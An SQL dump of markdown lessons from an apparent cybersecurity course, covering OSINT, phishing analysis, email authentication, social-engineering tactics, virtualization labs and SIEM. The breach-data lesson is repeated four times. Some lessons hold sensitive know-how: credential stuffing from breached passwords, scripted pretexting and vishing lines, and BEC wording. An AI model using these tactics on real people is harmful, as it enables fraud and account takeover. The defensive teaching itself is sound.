(544, 186, '## Breach Data & E-mail OSINT\n\n### HaveIBeenPwned (HIBP)\nTroy Hunt\'s database.\n*   Enter an email. It tells you which breaches it was in (Adobe, LinkedIn, Canva).\n*   It does **not** give you the password.\n\n### DeHashed / IntelX\nThese are paid/grey-hat services that **do** show the password (hashed or cleartext).\n*   **Use Case**: Red Teamers use this to credential stuff. \"I see Bob\'s password in 2012 was `Mustang2012`. I bet his password today is `Mustang2025!`\".\n\n### IMINT (Image Intelligence)\n*   **Geolocation**: Analyzing a photo to find where it was taken.\n    *   *Shadows*: Time of day.\n    *   *Power Plugs*: Country.\n    *   *Signage*: Language/Street names.\n*   **EXIF Data**: Metadata inside the JPG. (GPS coordinates, Camera Model). Most social media strips this, but direct uploads to blogs might not.', 'markdown', 15, '2025-12-26 22:15:16', '2025-12-29 14:04:25'),
(545, 187, '## Breach Data & E-mail OSINT\n\n### HaveIBeenPwned (HIBP)\nTroy Hunt\'s database.\n*   Enter an email. It tells you which breaches it was in (Adobe, LinkedIn, Canva).\n*   It does **not** give you the password.\n\n### DeHashed / IntelX\nThese are paid/grey-hat services that **do** show the password (hashed or cleartext).\n*   **Use Case**: Red Teamers use this to credential stuff. \"I see Bob\'s password in 2012 was `Mustang2012`. I bet his password today is `Mustang2025!`\".\n\n### IMINT (Image Intelligence)\n*   **Geolocation**: Analyzing a photo to find where it was taken.\n    *   *Shadows*: Time of day.\n    *   *Power Plugs*: Country.\n    *   *Signage*: Language/Street names.\n*   **EXIF Data**: Metadata inside the JPG. (GPS coordinates, Camera Model). Most social media strips this, but direct uploads to blogs might not.', 'markdown', 15, '2025-12-26 22:15:16', '2025-12-29 14:04:25'),
(546, 188, '## Breach Data & E-mail OSINT\n\n### HaveIBeenPwned (HIBP)\nTroy Hunt\'s database.\n*   Enter an email. It tells you which breaches it was in (Adobe, LinkedIn, Canva).\n*   It does **not** give you the password.\n\n### DeHashed / IntelX\nThese are paid/grey-hat services that **do** show the password (hashed or cleartext).\n*   **Use Case**: Red Teamers use this to credential stuff. \"I see Bob\'s password in 2012 was `Mustang2012`. I bet his password today is `Mustang2025!`\".\n\n### IMINT (Image Intelligence)\n*   **Geolocation**: Analyzing a photo to find where it was taken.\n    *   *Shadows*: Time of day.\n    *   *Power Plugs*: Country.\n    *   *Signage*: Language/Street names.\n*   **EXIF Data**: Metadata inside the JPG. (GPS coordinates, Camera Model). Most social media strips this, but direct uploads to blogs might not.', 'markdown', 15, '2025-12-26 22:15:16', '2025-12-29 14:04:25'),
(547, 189, '## Breach Data & E-mail OSINT\n\n### HaveIBeenPwned (HIBP)\nTroy Hunt\'s database.\n*   Enter an email. It tells you which breaches it was in (Adobe, LinkedIn, Canva).\n*   It does **not** give you the password.\n\n### DeHashed / IntelX\nThese are paid/grey-hat services that **do** show the password (hashed or cleartext).\n*   **Use Case**: Red Teamers use this to credential stuff. \"I see Bob\'s password in 2012 was `Mustang2012`. I bet his password today is `Mustang2025!`\".\n\n### IMINT (Image Intelligence)\n*   **Geolocation**: Analyzing a photo to find where it was taken.\n    *   *Shadows*: Time of day.\n    *   *Power Plugs*: Country.\n    *   *Signage*: Language/Street names.\n*   **EXIF Data**: Metadata inside the JPG. (GPS coordinates, Camera Model). Most social media strips this, but direct uploads to blogs might not.', 'markdown', 15, '2025-12-26 22:15:16', '2025-12-29 14:04:25'),
(548, 190, '# Module 18 Final Quiz\n\nTest your mastery of Open Source Intelligence.\n\n## Instructions\n*   **20 Questions**.\n*   Covering: Fundamentals, Dorking, People, Tools, and Ethics.\n\nGood Luck, Detective!', 'markdown', 15, '2025-12-26 22:15:16', '2025-12-26 22:15:16'),
(549, 191, '## Email Anatomy: RFC 5322\n\nTo stop phishing, you must read the **Header**.\n\n### The Envelope vs The Letter\n*   **Envelope (SMTP)**: `MAIL FROM: attacker@evil.com`. (The server reads this).\n*   **Letter (Header)**: `From: \"CEO\" <ceo@company.com>`. (The user reads this).\n*   **Spoofing**: The attacker puts their real address on the Envelope (so the email arrives) but puts the CEO\'s address on the Letter (so the victim is tricked).\n\n### Key Header Fields\n*   **Received**: The hop-by-hop path. Read from **Bottom to Top**.\n    *   `Received: from mail.evil.com [1.2.3.4]` -> **True Source**.\n*   **Reply-To**: Often different from \"From\".\n    *   \"From: HelpDesk\"\n    *   \"Reply-To: hacker@gmail.com\"\n*   **X-Mailer**: The software used.\n    *   `PHP/7.4` -> Suspicious. Normal people use Outlook/Gmail, not PHP scripts.', 'markdown', 15, '2025-12-26 22:17:47', '2025-12-29 16:32:38'),
(550, 192, '## Authentication: SPF, DKIM, DMARC\n\nThe Trinity of Email Security.\n\n### 1. SPF (Sender Policy Framework)\n*   **Identity Card**.\n*   DNS TXT Record: `v=spf1 include:_spf.google.com -all`\n*   **Meaning**: \"Only Google\'s servers are allowed to send email for my domain. Reject everyone else.\"\n*   **Check**: Look for `Authentication-Results: spf=pass` in the header.\n\n### 2. DKIM (DomainKeys Identified Mail)\n*   **Wax Seal**.\n*   Cryptographic signature attached to the email.\n*   **Meaning**: \"This email has not been modified in transit.\"\n*   **Check**: Look for `dkim=pass`.\n\n### 3. DMARC (Domain-based Message Authentication)\n*   **The Policy**.\n*   \"If SPF fails OR DKIM fails, what should I do?\"\n    *   `p=none`: Do nothing (Analysis mode).\n    *   `p=quarantine`: Send to Spam folder.\n    *   `p=reject`: Bounce the email (Delete it).\n*   **Goal**: Every company wants to be at `p=reject`.', 'markdown', 15, '2025-12-26 22:17:47', '2025-12-29 16:32:38'),
(551, 193, '## The CEO Fraud (BEC)\n\n**Business Email Compromise (BEC)** causes more financial loss than Ransomware.\n\n### The Scenario\n*   **Target**: The CFO (Finance Director).\n*   **Attacker**: Impersonates the CEO.\n*   **Email**: \"Hi Bob, I am in a meeting. Be discreet. I need you to wire $50k to this vendor immediately. It is for a secret acquisition.\"\n\n### Indicators\n1.  **Urgency**: \"Immediately\", \"Secret\", \"Before the cutoff\".\n2.  **Authority**: Leveraging the CEO\'s title to bypass procedures.\n3.  **Spoofing**: Look closely at the email.\n    *   `ceo@company-corp.com` (Typosquatting).\n    *   `ceo@company.com` (Display Name Spoofing).\n\n### Defense\n*   **Process**: \"Any wire transfer over $10k requires voice verification.\"\n*   **Tagging**: Add `[EXTERNAL]` tag to email subject lines.', 'markdown', 15, '2025-12-26 22:17:47', '2025-12-29 16:32:38'),
(552, 194, '## Investigation: Malicious Attachments\n\n### Common File Types\n1.  **.exe / .scr / .bat**: Executables. Usually blocked by gateway.\n2.  **.docm / .xlsm**: Office Macros. Very common.\n    *   User opens Doc -> Click \"Enable Content\" -> Macro runs PowerShell -> Downloads Malware.\n3.  **.zip / .iso**: Containers. Used to bypass scanners.\n4.  **.html**: HTML Smuggling. The file decodes itself in the browser.\n\n### Analysis Tools\n1.  **Talos File Reputation**: Check the hash.\n2.  **OLEVBA**: Python tool to extract Macros from Office docs.\n3.  **Any.Run / Joe Sandbox**: Detonate the file in a sandbox and watch the video.', 'markdown', 15, '2025-12-26 22:17:47', '2025-12-29 14:04:25'),
(553, 195, '## Investigation: Credential Harvesting\n\n**Goal**: Steal username/password.\n\n### Mechanism\n1.  **The Hook**: \"Your Office 365 password has expired. Click here to keep the same password.\"\n2.  **The Line**: Link goes to `microsoft-login-secure.com` (Phishing Site).\n3.  **The Sinker**: Site looks 100% like Microsoft. User types creds. Site saves them and redirects user to real Microsoft.\n\n### Indicators\n*   **URL Analysis**: Look at the domain. Is it `microsoft.com`?\n*   **HTTPS**: Phishing sites DO use HTTPS (Green lock). Certificates are free from Let\'s Encrypt. Do not trust the lock.\n*   **Brand**: Use of official logos.', 'markdown', 15, '2025-12-26 22:17:47', '2025-12-29 14:04:25'),
(554, 196, '## Phishing Final Assessment\nCheck your knowledge on SPF, DMARC, and Analysis techniques.', 'markdown', 15, '2025-12-26 22:17:47', '2025-12-29 14:04:25'),
(555, 201, '## Psychology of Persuasion\n\nSocial Engineering hacks the *human*, not the machine.\nRobert Cialdini defined 6 principles.\n\n### 1. Authority\n\"I am the VP of IT. Do what I say.\"\n*   People obey authority figures automatically.\n\n### 2. Urgency / Scarcity\n\"Your account will be deleted in 1 hour.\"\n*   Panic shuts down critical thinking.\n\n### 3. Reciprocity\n\"I helped you with that ticket last week. Can you help me now?\"\n*   Social debt.\n\n### 4. Liking\n\"Wow, you like the Yankees too?\"\n*   We trust people we like.\n\n### 5. Social Proof\n\"Everyone else in the department has already done the survey.\"\n*   Herd mentality.\n\n### 6. Commitment\n\"Can you just answer one small question?\" -> \"Okay, verify your password.\"\n*   Foot-in-the-door technique.', 'markdown', 15, '2025-12-26 22:28:54', '2025-12-29 16:32:38'),
(556, 202, '## Pretexting and Impersonation\n\nCreating a scenario (The Pretext).\n\n### The IT Support Scam\n*   **Role**: New IT Helpdesk Guy.\n*   **Pretext**: \"Hey, we are migrating servers and your account is desynchronized. I need to verify your password.\"\n*   **Why it works**: Employees are trained to help IT.\n\n### Defense\n**Authentication**.\n\"Can you verify your employee ID?\"\n\"I will call you back on the internal extension listed in the directory.\" (The attacker hates this).', 'markdown', 15, '2025-12-26 22:28:54', '2025-12-29 14:06:41'),
(557, 203, '## Vishing (Voice Phishing)\n\nHacking over the phone.\n\n### The Deepfake Era\n*   AI can now clone voices with 3 seconds of audio.\n*   \"Hi Mom, I\'m in jail, send money.\" (Grandparent Scam).\n*   \"Hi Process Team, this is the CEO, approve the transaction.\"\n\n### Techniques\n1.  **Caller ID Spoofing**: Making the phone show \"Internal IT Helpdesk\".\n2.  **Background Noise**: Playing office sounds (typing, printers) to make the lie convincing.\n\n### Defense\n*   **Callback Policy**: \"I need to verify. I will hang up and call you back at your internal extension listed in the directory.\"\n    *   If they resist (\"No, I am on my cell!\"), it is a scam.\n*   **Challenge-Response**: \"What is the daily code word?\"', 'markdown', 15, '2025-12-26 22:28:54', '2025-12-29 16:32:38'),
(558, 204, '## Smishing (SMS Phishing)\n\nTexts are trusted more than emails.\n\n### Delivery Package Scam\n\"USPS: We missed your delivery. Click here to reschedule: `usps-track-package.com`.\"\n*   **Payload**: Credit Card theft (small fee to reschedule) or Android Malware download.\n\n### 2FA Intercept\n\"Your bank account is compromised. Please read me the code sent to your phone to verify identity.\"\n*   **Reality**: The attacker has your password. The code is the 2FA login token. If you read it, they are in.', 'markdown', 15, '2025-12-26 22:28:54', '2025-12-29 14:06:41'),
(559, 205, '## Physical: Tailgating & Dumpster Diving\n\n### Tailgating (Piggybacking)\n*   **Concept**: Walking in behind someone who has badged in.\n*   **Exploit**: \"Hold the door!\" (Kindness).\n*   **Defense**: \"One Badge, One Entry\" policy. Even if it is rude, shut the door.\n\n### Dumpster Diving\n*   **Concept**: Looking through trash.\n*   **Target**: Org Charts, Sticky notes with passwords, Bank statements, Vendor invoices.\n*   **Defense**:\n    *   **Shred Everything**.\n    *   Secure Trash Bins (Locked).\n\n### USB Drops (Baiting)\n*   Dropping a USB key labeled \"Payroll 2025\" in the parking lot.\n*   Curiosity kills the cat (and the network).\n*   **Defense**: Disable USB Mass Storage via Group Policy.', 'markdown', 15, '2025-12-26 22:28:54', '2025-12-29 16:32:38'),
(560, 206, '## Baiting and Quid Pro Quo\n\n### Baiting (The USB Drop)\nLeaving a USB drive labeled \"Payroll 2024\" or \"Layoff Plan\" in the parking lot.\n*   **Impact**: Curiosity > Security. Victim plugs it in. Malware auto-runs.\n*   **Defense**: Glue USB ports shut (Extreme) or Disable Mass Storage via GPO.\n\n### Quid Pro Quo\n\"Something for Something\".\n*   \"Take this survey and win a free Chocolate Bar.\" (Password is one of the survey questions).', 'markdown', 15, '2025-12-26 22:28:54', '2025-12-29 14:06:41');
INSERT INTO `lesson_content` (`id`, `task_id`, `content`, `content_type`, `reading_time_minutes`, `created_at`, `updated_at`) VALUES
(561, 207, '## Social Engineering Final Quiz\nTest your ability to spot the lie.', 'markdown', 15, '2025-12-26 22:28:54', '2025-12-29 14:06:41'),
(562, 211, '## Introduction to Virtualization\n\n**Virtualization** is the magic that runs the cloud.\nIt allows one physical computer (Host) to run multiple fake computers (Guests).\n\n### Physical vs Virtual\n*   **Physical**: One OS controls the hardware directly. If the OS crashes, the machine stops.\n*   **Virtual**: A **Hypervisor** sits between the hardware and the OS.\n    *   It slices the RAM (16GB -> 4GB for VM1, 4GB for VM2).\n    *   It slices the CPU time.\n\n### Why do we use it in Security?\n1.  **Isolation**: If you run malware in a VM, it cannot infect your real laptop (usually).\n2.  **Snapshots**: You can save the state. If you delete `System32` by accident, just click \"Revert\".\n3.  **Efficiency**: You can run a Windows DC, a Linux Web Server, and a Kali Attacker all on one laptop.', 'markdown', 10, '2025-12-26 22:32:26', '2025-12-29 16:32:49'),
(563, 212, '## Hypervisors: Type 1 vs Type 2\n\nThe software that runs VMs.\n\n### Type 1 (Bare Metal)\n*   **Installs**: Directly on the hardware. NO Windows/MacOS underneath.\n*   **Performance**: Extremely fast.\n*   **Usage**: Enterprise/Servers.\n*   **Examples**: VMware ESXi, Microsoft Hyper-V (Server), Proxmox.\n\n### Type 2 (Hosted)\n*   **Installs**: Like an app on your existing OS.\n*   **Performance**: Slower (overhead of the Host OS).\n*   **Usage**: Laptops/Desktops.\n*   **Examples**: VMware Workstation, Oracle VirtualBox.\n*   **Student Lab**: You will use Type 2 (VirtualBox) because you don\'t want to wipe your laptop.', 'markdown', 10, '2025-12-26 22:32:26', '2025-12-29 16:32:49'),
(564, 213, '## Setting Up VirtualBox (Free)\n\nOracle VirtualBox is the most popular free hypervisor.\n\n### Installation Steps\n1.  Download from virtualbox.org.\n2.  Install the **Extension Pack** (Critical! This gives you USB support and better drivers).\n3.  Enable **Virtualization Technology (VT-x / AMD-V)** in your BIOS.\n    *   *Error*: If you get \"Verr_VMX_No_VMX\", restart computer, go to BIOS, enable VT-x.\n\n### Common Settings\n*   **RAM**: Give it 2GB-4GB (Don\'t starve your host).\n*   **CPU**: Give it 2 Cores.\n*   **Video Memory**: Max it out (128MB) for smooth UI.', 'markdown', 10, '2025-12-26 22:32:26', '2025-12-29 16:32:49'),
(565, 214, '## VMware Workstation (Pro/Player)\n\nThe industry standard for desktop virtualization.\n\n### Benefits over VirtualBox\n*   **Better 3D Acceleration**: Smoother UI.\n*   **Unity Mode**: Run Linux apps directly on your Windows desktop window.\n*   **Compatibility**: Most enterprise appliances (OVF) are built for VMware.\n*   **Networking**: More stable NAT engine.\n\n### Free vs Pro\n*   **Player**: Free for personal use. Can run VMs. Cannot create complicated networks.\n*   **Pro**: Paid. Full snapshot trees, Network Editor (Virtual Network Editor is powerful).', 'markdown', 10, '2025-12-26 22:32:26', '2025-12-29 14:04:25'),
(566, 215, '## Creating Your First VM (Kali Linux)\n\n**Kali Linux** is the standard OS for penetration testing.\n\n### The Easy Way (OVA)\n1.  Download the **Kali Linux VirtualBox Image** (not the ISO installer).\n2.  It comes as a `.ova` file.\n3.  Double click the file. VirtualBox imports it instantly with all settings correct.\n4.  User/Pass: `kali` / `kali`.\n\n### The Hard Way (ISO)\n1.  Create New VM \"Linux / Debian 64-bit\".\n2.  Mount the ISO file as a CD-ROM.\n3.  Boot and run the installer manually.\n*   *Why do this?* If you want a custom, lightweight install.', 'markdown', 10, '2025-12-26 22:32:26', '2025-12-29 16:32:49'),
(567, 216, '## Network Modes: NAT, Bridged, Host-Only\n\nThis confuses everyone.\n\n### 1. NAT (Default)\n*   **Analogy**: Your VM is behind a router (your Host).\n*   **Access**:\n    *   VM -> Internet: YES.\n    *   Internet -> VM: NO.\n    *   Host -> VM: NO (Tricky, requires port forwarding).\n*   *Use*: Just browsing the web.\n\n### 2. Bridged\n*   **Analogy**: Your VM plugs a cable directly into your home Wi-Fi router.\n*   **Result**: It gets its own IP on your LAN (e.g., `192.168.1.50`).\n*   **Access**: Everyone can talk to everyone.\n*   *Use*: If you want to SSH into it from another laptop.\n\n### 3. Host-Only\n*   **Analogy**: A private cable between Host and VM only. No Internet.\n*   **Access**: Extremely secure.\n*   *Use*: Malware Analysis (So the malware can\'t phone home).', 'markdown', 10, '2025-12-26 22:32:26', '2025-12-29 16:32:49'),
(568, 217, '## Snapshots & Clones (The Safety Net)\n\n### Snapshots\n*   A \"Save Game\" point.\n*   **Workflow**:\n    1.  Install Windows.\n    2.  Take Snapshot \"Fresh Install\".\n    3.  Run Ransomware. (PC destroyed).\n    4.  Revert to \"Fresh Install\". (PC fixed in 10 seconds).\n*   *Warning*: Snapshots consume disk space over time.\n\n### Clones\n*   **Full Clone**: A complete copy (takes space). Independent.\n*   **Linked Clone**: A shortcut referencing the parent. Fast, saves space, but if you delete the parent, the clone breaks.', 'markdown', 10, '2025-12-26 22:32:26', '2025-12-29 16:32:49'),
(569, 221, '## The Central Nervous System of Security\n\n**Security Information and Event Management (SIEM)** is not just a tool; it is the beating heart of a modern Security Operations Center (SOC). To understand SIEM, we must first understand the problem it solves: **Data Overload and Disconnected Visibility.**\n\n### The Pre-SIEM Nightmare\nImagine you are a security administrator in the year 2005. You are responsible for:\n*   **50 Windows Servers** (generating Windows Event Logs)\n*   **20 Linux Web Servers** (generating Syslog/Apache logs)\n*   **2 Firewalls** (generating proprietary traffic logs)\n*   **1 Antivirus Server** (generating alert logs)\n\nOne day, the CEO\'s laptop is infected with malware. To investigate, you must:\n1.  Remote Desktop into the Antivirus server to see the alert time.\n2.  SSH into the proxy server and `grep` through gigabytes of logs to see what URL the CEO visited.\n3.  Login to the Firewall web interface to see if any strange connections were made out to the internet.\n4.  RDP into the Domain Controller to see if the user account was locked out.\n\nThis process is manual, slow, and impossible to scale. A single firewall can generate **10GB of logs per day**. No human can read that. Furthermore, the \"signal\" of an attack is often split across these devices.\n\n### Enter the SIEM\nA SIEM solves this by unifying your view. It performs three critical functions, often called the \"Trinity of SIEM\":\n\n#### 1. Aggregation (Collection)\nThe SIEM reaches out and grabs logs from *everything*. It acts as a central warehouse.\n*   **Network Devices**: Switches, Routers, Firewalls send Syslog.\n*   **Endpoints**: Windows and Linux servers send OS logs.\n*   **Applications**: Web servers, databases, and custom apps send application logs.\n*   **Security Tools**: IDPS, Antivirus, and DLP solutions send alerts.\n\n#### 2. 
Normalization (Translation)\nThis is the \"Universal Translator\" function.\n*   **Problem**: A Windows log says `EventID: 4625` (Failed Login). A Linux log says `Failed password for user root`. A Cisco router says `%SEC-6-IPACCESSLOGP`.\n*   **Solution**: The SIEM parses these raw logs and maps them to standard fields.\n    *   `src_ip`: 192.168.1.5\n    *   `user`: admin\n    *   `action`: failure\n    *   `timestamp`: 2023-10-27T10:00:00Z\nNow, you can search for `action=failure` and see results from Windows, Linux, and Cisco all in one view.\n\n#### 3. Correlation (Intelligence)\nThis is the \"Brain\". It connects the dots between seemingly unrelated events.\n*   **Event A (Firewall)**: Inbound connection from 1.2.3.4 on Port 445 (Blocked).\n*   **Event B (VPN)**: Successful login from 1.2.3.4 (Allowed).\n*   **Event C (DC)**: User \"HelpDesk\" added to \"Domain Admins\" group.\n\nIndividually, Event B might look normal. But **Event A + Event B + Event C** appearing within 5 minutes triggers a high-severity **Correlation Rule**: \"External Attack with Privilege Escalation\".\n\n### Why is SIEM Mandatory?\n1.  **Compliance**: Regulations like **PCI-DSS**, **HIPAA**, **SOX**, and **GDPR** explicitly require centralized log management and retention. You cannot pass an audit without it.\n2.  **Forensics**: When a breach is discovered (often months after it happened), the SIEM is the *only* place where you can find historical execution records to trace the attacker\'s path.\n3.  **Real-Time Detection**: It is the only way to detect complex, multi-stage attacks (like APTs) that move laterally across your network.\n\n### The Modern Evolution: SIEM + SOAR + UEBA\nTraditional SIEM had a flaw: it generated too many alerts. 
Modern SIEMs are evolving into **Security Analytics Platforms**:\n*   **UEBA (User and Entity Behavior Analytics)**: Instead of static rules (\"Alert if > 5 failed logins\"), it uses Machine Learning (\"Alert because Bob never logs in at 3 AM from North Korea\").\n*   **SOAR (Security Orchestration, Automation, and Response)**: Automated actions. If the SIEM sees a virus, the SOAR automatically isolates the computer from the network.\n\n### Summary\nIf the SOC is a castle, the Firewalls are the walls, the EDR is the guards, and the **SIEM is the Watchtower** where the commander sees the entire battlefield.', 'markdown', 15, '2025-12-26 22:35:58', '2025-12-29 15:04:12'),
(570, 222, '## Feeding the Beast: Log Sources & Ingestion\n\nA SIEM is only as good as the data you feed it. As the saying goes: **\"Garbage In, Garbage Out.\"** (Or worse: \"Nothing In, Blindness Out\").\n\n### Types of Log Data\nNot all logs are created equal. A SOC Analyst deals with three primary categories:\n\n#### 1. Event Logs (Structured)\nThese are logs generated by the Operating System. They are highly structured and rich in metadata.\n*   **Windows Event Logs**: The gold standard for endpoint visibility. Stored in binary `.evtx` format.\n    *   *Security*: Logins (`4624`), Process Creation (`4688`), Account Management.\n    *   *System*: Service failures, startup/shutdown.\n    *   *Application*: Errors from SQL Server, IIS, Chrome.\n*   **Linux Syslog**: The standard for Unix-based systems. Usually text-based but follows a facility/severity structure. `/var/log/auth.log` (authentication), `/var/log/syslog` (general).\n\n#### 2. Network Logs (Traffic)\nThese show the \"flow\" of data.\n*   **Firewall Logs**: Allow/Deny decisions. Crucial for perimeter defense.\n*   **NetFlow/IPFIX**: Metadata about traffic (Who, What, Where, When, How much) without the actual packet payload. \"Phone bill\" style records.\n*   **Proxy/DNS Logs**: Provide Layer 7 visibility. URLs visited (`evil.com`), DNS queries made.\n\n#### 3. Security Alerts (Context)\n*   Antivirus detections, IDS/IPS signatures (`ET TROJAN...`), DLP violations.\n\n### Ingestion Methods: Push vs. Pull\n\n#### The PUSH Method (Agents/Forwarders)\nThis is the most common and robust method for servers and endpoints. A small software agent is installed on the device.\n*   **How it works**: The agent watches log files/channels in real-time. 
When a new line is written, it immediately encrypts and sends it to the SIEM.\n*   **Examples**:\n    *   **Splunk Universal Forwarder (UF)**: Lightweight, reliable.\n    *   **Elastic Winlogbeat**: Sends Windows logs to Elasticsearch.\n    *   **Wazuh Agent**: Performs log collection + FIM + Config assessment.\n*   **Pros**: Real-time, encrypted, can buffer logs if the network goes down (caching).\n*   **Cons**: Requires installing software on every endpoint (management overhead).\n\n#### The PULL Method (Agentless)\nUsed for devices where you cannot install software (Routers, Switches, Printers, Appliances).\n*   **WMI (Windows Management Instrumentation)**: The SIEM remotely queries the Windows server to ask for logs. *High overhead, rarely used for logs now.*\n*   **Log Collectors/Concentrators**: A dedicated server sits in the middle. Network devices send syslog to the Collector. The Collector forwards to the SIEM.\n*   **API Fetching**: Modern Cloud method. The SIEM runs a script every 5 minutes to fetch logs from AWS CloudTrail, Office 365, or Okta APIs.\n\n### The Challenges of Ingestion\n\n#### 1. Time Synchronization (NTP)\nIf your Firewall thinks it is 2:00 PM and your Web Server thinks it is 1:00 PM, correlation is impossible. **NTP (Network Time Protocol)** is critical. All devices must sync to a central, reliable time source.\n\n#### 2. EPS (Events Per Second) & Licensing\nSIEMs are often expensive. Licensing is frequently based on:\n*   **Volume**: GBs of logs ingested per day.\n*   **EPS**: Average events per second.\nA noisy firewall in \"Debug\" mode can bankrupt a SOC by generating millions of useless events. Analysts must tune \"logging levels\" to capture *security-relevant* info without the noise.\n\n#### 3. Bandwidth\nSending full packet captures or debug logs from a satellite office over a T1 line will crash the network. 
Compression and filtering at the source (Agent) are vital.\n\n### Analyst Tip\nWhen investigating an incident, always ask: **\"What is NOT logging?\"** Attackers frequently disable logging (clearing Event Logs) or stop the Splunk Forwarder service as their first move. A \"Gap in Logs\" is often the biggest indicator of compromise.', 'markdown', 15, '2025-12-26 22:35:58', '2025-12-29 15:04:12'),
(571, 223, '## Making Sense of Chaos: Normalization & Parsing\n\nImagine trying to read a book where every sentence is written in a different language. That is what raw logs look like to a computer.\n\n**Raw Log Example 1 (Cisco ASA Firewall):**\n`Oct 27 10:00:01 firewall-01 %ASA-6-302013: Built inbound TCP connection 1234 for outside:192.168.1.10/4444 (192.168.1.10/4444) to dmz:10.0.0.5/80 (10.0.0.5/80)`\n\n**Raw Log Example 2 (Apache Web Server):**\n`192.168.1.10 - - [27/Oct/2023:10:00:01 +0000] \"GET /index.html HTTP/1.1\" 200 2326`\n\n**Raw Log Example 3 (Windows Event 4624):**\n`Logon Type: 3, Source Network Address: 192.168.1.10, Account Name: Guest`\n\nA human can look at these and deduce that `192.168.1.10` is the \"Source IP\" in all three cases. But a computer cannot. If you search for `src_ip=192.168.1.10`, the computer won\'t find anything unless the logs are **Parsed** and **Normalized**.\n\n### The Parsing Process\nParsing is the act of breaking a raw text string into structured fields using logic (often Regular Expressions or \"Regex\").\n\n**Parsing the Apache Log:**\n*   Raw: `192.168.1.10 - - ...`\n*   Regex Rule: `^(\\S+) \\S+ \\S+ \\[([\\w:/]+\\s[+-]\\d{4})\\] \"(\\S+)\\s?(\\S+)?\\s?(\\S+)?\" (\\d{3}|-) (\\d+|-)`\n*   **Extracted Fields**:\n    *   client_ip: `192.168.1.10`\n    *   timestamp: `27/Oct/2023...`\n    *   method: `GET`\n    *   url: `/index.html`\n    *   status_code: `200`\n\nNow the SIEM understands the data.\n\n### Normalization: The Rosetta Stone\nParsing extracts the data, but **Normalization** standardizes the *names* of the fields.\n*   Vendor A calls it: `source_address`\n*   Vendor B calls it: `src_ip`\n*   Vendor C calls it: `ClientIP`\n*   Vendor D calls it: `c_ip`\n\nIf you are hunting for an IP, you don\'t want to run 4 different queries (`source_address=X OR src_ip=X OR...`).\nNormalization maps ALL of these to a single **Common Information Model (CIM)** field, usually `src_ip` or `source.ip`.\n\n### Why This Matters for Analysts\n1.  
**Field Extraction Errors**: Sometimes parsing fails. If a developer changes the log format of an app, the SIEM might stop extracting the username. You will see the raw log, but searches for `user=\"baris\"` will return 0 results. This is a common troubleshooting task for analysts.\n2.  **Performance**: Searching based on indexed fields (`src_ip=1.2.3.4`) is milliseconds fast. Searching raw text (`\"1.2.3.4\"`) is essentially doing `Ctrl+F` on terabytes of text—it is agonizingly slow.\n3.  **Visualizations**: You cannot build a chart of \"Top 10 Bad IPs\" if the IP address isn\'t extracted into a field.\n\n### Common Schemas\n*   **Splunk CIM (Common Information Model)**: The standard for Splunk.\n*   **ECS (Elastic Common Schema)**: The standard for ELK/Elastic.\n*   **OCSF (Open Cybersecurity Schema Framework)**: An emerging open standard backed by AWS, Splunk, and IBM to unify log formats across the industry.\n\n### Scenario\nAn attacker uses a custom tool that generates logs in a format your SIEM hasn\'t seen before.\n*   **Bad Analyst**: Ignores it because it doesn\'t show up in dashboards.\n*   **Good Analyst**: Notices the raw logs, writes a custom Regex parser to extract the `Command_Line` field, and creates a new alert for it.', 'markdown', 15, '2025-12-26 22:35:58', '2025-12-29 15:04:12'),
(572, 224, '## The Magic of Correlation: Finding the Needle in the Stack\n\nCorrelation is the brain of the SIEM. It is the logic engine that evaluates millions of individual events to identify patterns that indicate a security incident.\n\nWithout correlation, you just have a massive library of boring journals. Correlation is the detective reading all those journals to solve the crime.\n\n### The Logic of Correlation rules\nA correlation rule generally follows this Boolean logic structure:\n**IF** (Condition A) **AND** (Condition B) **HAPPENS WITHIN** (Time Window T) **THEN** (Trigger Alert).\n\n#### Example 1: Brute Force Detection\n*   **Raw Event**: Windows Event 4625 (Failed Login).\n*   **Problem**: Users mistype passwords all the time. One event is noise.\n*   **Correlation Rule**:\n    *   `event_id=4625` (Failed Login)\n    *   `count > 10`\n    *   `distinct_destination_user < 2` (Standard Brute force) OR `distinct_destination_user > 10` (Password Spraying)\n    *   `time_window = 5 minutes`\n*   **Meaning**: If the same IP fails to login 10 times in 5 minutes, ALERT.\n\n#### Example 2: The \"Impossible Travel\"\n*   **Event A**: User \"Alice\" logs in from New York (IP 1.2.3.4) at 10:00 AM.\n*   **Event B**: User \"Alice\" logs in from London (IP 5.6.7.8) at 10:15 AM.\n*   **Logic**: Distance between NY and London is 3,400 miles. It is impossible to travel that fast.\n*   **Rule**: IF (Login A success) AND (Login B success) AND (GeoIP distance > 500 miles) AND (Time difference < Flight time) -> ALERT.\n\n#### Example 3: Behavioral Chain (The Kill Chain)\n*   **Step 1**: Firewall detects Port Scan from IP X.\n*   **Step 2**: IDS detects SQL Injection attempt from IP X.\n*   **Step 3**: Web Server records 200 OK (Success) for a large file download to IP X.\n*   **Correlation**: Trigger \"Critical Compromise\" alert. 
A single IP scanned, exploited, and stole data.\n\n### Tuning: The Analyst\'s Nightmare\nCorrelation rules are prone to two deadly sins:\n\n#### 1. False Positives (The Boy Who Cried Wolf)\nThe rule alerts, but it\'s benign activity.\n*   *Alert*: \"Brute Force Detected!\"\n*   *Reality*: A script running on a server had an expired password and tried to retry connection 50 times in a second.\n*   *Consequence*: Alert Fatigue. Analysts stop paying attention to alerts if 90% are fake.\n\n#### 2. False Negatives (The Silent Killer)\nThe attack happens, but the rule doesn\'t trigger.\n*   *Attack*: Low-and-slow brute force. The attacker tries 1 password every hour.\n*   *Rule Limitation*: The rule was set to \"10 attempts in 5 minutes\". It missed the attack completely.\n*   *Consequence*: Breach.\n\n### Dynamic vs. Static Correlation\n*   **Static**: Rules we explicitly write (`count > 10`). Good for known threats.\n*   **Dynamic (Heuristic/Behavioral)**: The system learns what is \"normal\".\n    *   \"Alice usually downloads 50MB of data a day. Today she downloaded 5GB. ALERT.\"\n    *   This catches \"unknown unknowns\" or zero-days that don\'t match a signature.\n\n### The Role of Context\nCorrelation gets smarter with context.\n*   *Event*: \"Attack from External IP detected against Server A.\"\n*   *Context*: \"Server A is a test server with no sensitive data.\" -> **Low Severity**.\n*   *Context*: \"Server A is the CEO\'s laptop.\" -> **High Severity**.\n*   *Context*: \"Vulnerability Scanner says Server A is patched against this attack.\" -> **False Positive (mostly)**.\n\nA modern SIEM integrates with Asset Management and Vulnerability Scanners to enrich alerts with this context automatically.', 'markdown', 15, '2025-12-26 22:35:58', '2025-12-29 15:04:12'),
